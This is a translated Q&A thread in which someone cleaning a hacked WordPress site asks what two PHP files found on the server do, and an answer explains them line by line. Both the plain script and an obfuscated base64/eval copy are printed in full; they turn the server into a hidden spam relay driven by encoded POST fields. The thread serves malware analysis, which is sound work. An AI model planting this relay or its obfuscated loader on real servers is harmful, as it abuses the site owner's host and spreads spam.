對服務器的PHP攻擊，這段代碼在做什麼？

Question

所以我一直在幫助一個在wordpress上在godaddy服務器上遭受惡意軟件攻擊的人。我想我已經刪除了導致問題的代碼，但我只是好奇這個php在做什麼，好像它循環存儲在POST中的變量並試圖解碼任何信息，然後通過電子郵件發送。有人能幫我理解這一點嗎？乾杯

<?php 
    $data = array(''); 
    foreach ($_POST as $key => $value) { 
     array_push($data, $value); 
    } 
    $jxWnO = stripslashes(base64_decode(base64_decode($data[1]))); 
    $e2WPWta = stripslashes(base64_decode(base64_decode($data[2]))); 
    $hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3]))); 
    $JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4]))); 
    $Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg)); 
    if ($Fr2ZEIZYuKj) { 
     echo $Fr2ZEIZYuKj; 
    } else { 
     echo '99'; 
    } 
?> 

然後在一個單獨的文件：

<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval(\"$code\");") ?> 

Answer 1

瓦爾更名爲便於閱讀...

<?php 
    $data = array(''); 
    // Takes a post submitted to this url 
    foreach ($_POST as $key => $value) { 
     array_push($data, $value); 
    } 
    // For each post form field in the array it adds them to vars after decoding them twice. 

    $sVar1 = stripslashes(base64_decode(base64_decode($data[1]))); 
    $sVar2 = stripslashes(base64_decode(base64_decode($data[2]))); 
    $sVar3 = stripslashes(base64_decode(base64_decode($data[3]))); 
    $sVar4 = stripslashes(base64_decode(base64_decode($data[4]))); 

    // Then it emails the data submitted to the email contained in var1 
    // bool mail (string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]]) 
    $sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4)); 

    // Outputs mail return function (success/error(99)) TRUE | FALSE 
    if ($sVar5) { 
     // If TRUE prints var5 
     echo $sVar5; 
    } else { 
     // If does not email successfully prints 99 
     echo '99'; 
    } 

這是非常有趣的 - 你能如何將兩個文件擴展/代碼片段是相互關聯和相互作用的？

二腳本混淆略有減少解碼後：

"\$var1 = array(''); 
\x66\x6F\x72\x65\x61\x63\x68 (\$\x5F\x50\x4F\x53\x54 as \$var2 => \$var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68(\$var1, \$var3);} 
\$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[1]))); 
\$var4 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[2]))); 
\$var8 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[3]))); 
\$var5 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[4]))); 
\$var6 = \x6D\x61\x69\x6C(\x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var7), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var4), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var8), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var5)); 
\x69\x66 (\$var6){ \x65\x63\x68\x6F \$var6;} else { \x65\x63\x68\x6F '\x39\x39';}"